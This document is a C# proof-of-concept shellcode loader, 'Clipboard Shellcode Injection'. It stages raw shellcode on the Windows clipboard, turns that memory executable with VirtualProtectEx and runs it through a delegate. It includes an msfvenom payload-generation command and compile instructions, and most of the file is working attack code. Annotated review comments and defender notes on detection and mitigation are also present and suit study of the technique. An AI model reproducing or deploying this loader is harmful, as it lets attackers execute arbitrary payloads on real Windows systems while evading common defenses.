Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
{
/// <summary>
/// Proof-of-concept that reads raw bytes from a hard-coded file, hands them to the Windows
/// clipboard as CF_BITMAP data, flips the protection of the memory behind the returned
/// clipboard handle to PAGE_EXECUTE_READ (0x20) and then calls into it through a delegate.
/// </summary>
/// <remarks>
/// Defender notes (what this sequence looks like from the outside):
///  - A process reads a .bin file, then calls OpenClipboard / SetClipboardData / CloseClipboard
///    with a raw pinned buffer rather than a bitmap handle.
///  - VirtualProtectEx is then used to make a non-image, clipboard-owned region executable
///    (old protection -> 0x20). A transition of non-image memory to an executable protection
///    followed by an indirect call into that region is the primary detection point; EDR hooks on
///    VirtualProtect(Ex) and memory scans for executable private/non-image pages both surface it.
///  - Mitigation is the usual one for unmanaged execution from managed code: application control
///    on the resulting binary, monitoring of the VirtualProtect(Ex) -> executable transition, and
///    alerting on managed processes that take a delegate over non-image memory.
/// </remarks>
class Program
{
// Delegate used to call into the clipboard-backed memory as if it were a function.
// Return type is IntPtr; whether the bytes actually return anything is not knowable here —
// the return value is discarded below.
private delegate IntPtr test();
// Entry point: read the file, stage it on the clipboard, make it executable, call it.
static void Main(string[] args)
{
// Hard-coded source path for the raw bytes; the whole file is loaded into memory.
byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
// Return value (bool) is ignored; a failed open is not detected here.
OpenClipboard(IntPtr.Zero);
// Pin the managed array so its address is stable for the native calls that follow.
// NOTE(review): the handle is never freed, so the array stays pinned for the process lifetime.
GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();
// SetClipBoardData() formats that work:
// CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9
// https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats
// The pinned buffer address is passed where an HBITMAP is expected. The returned value is the
// clipboard's handle for the data; it is not checked for IntPtr.Zero, so on failure the
// VirtualProtectEx call below runs against address zero and the if-guard simply skips execution.
IntPtr scData = SetClipboardData(0x2, payloadpointer); //CF_BITMAP = 0x2
CloseClipboard();
// Receives the previous protection from VirtualProtectEx; the initial 0 is overwritten.
// NOTE(review): "RW by default" is an assumption about the clipboard-owned region — not
// established by anything in this file.
uint oldProtect = 0; //Old protect is RW by default
// 0x20 is PAGE_EXECUTE_READ. This is the point at which non-image memory becomes executable
// and is the most reliable place to observe the technique. This import lacks SetLastError,
// so a failure here leaves no Marshal.GetLastWin32Error() value to inspect.
if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
{
// Wraps the clipboard-handle address in a delegate and transfers control into it.
test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
executesc();
}
}
// user32: opens the clipboard for the calling thread; hWndNewOwner = IntPtr.Zero (no owning window).
[DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
private static extern bool OpenClipboard(IntPtr hWndNewOwner);
// user32: places data on the clipboard in format uFormat; returns the handle to the data.
[DllImport("User32.dll", SetLastError = true)]
static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);
// user32: releases the clipboard.
[DllImport("user32.dll", SetLastError = true)]
static extern bool CloseClipboard();
// kernel32: changes page protection of a region in the given process.
// NOTE(review): the only import here without SetLastError = true — inconsistent with the others.
[DllImport("kernel32.dll")]
static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// kernel32: returns the pseudo-handle for the calling process (no open/close required).
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetCurrentProcess();
}
}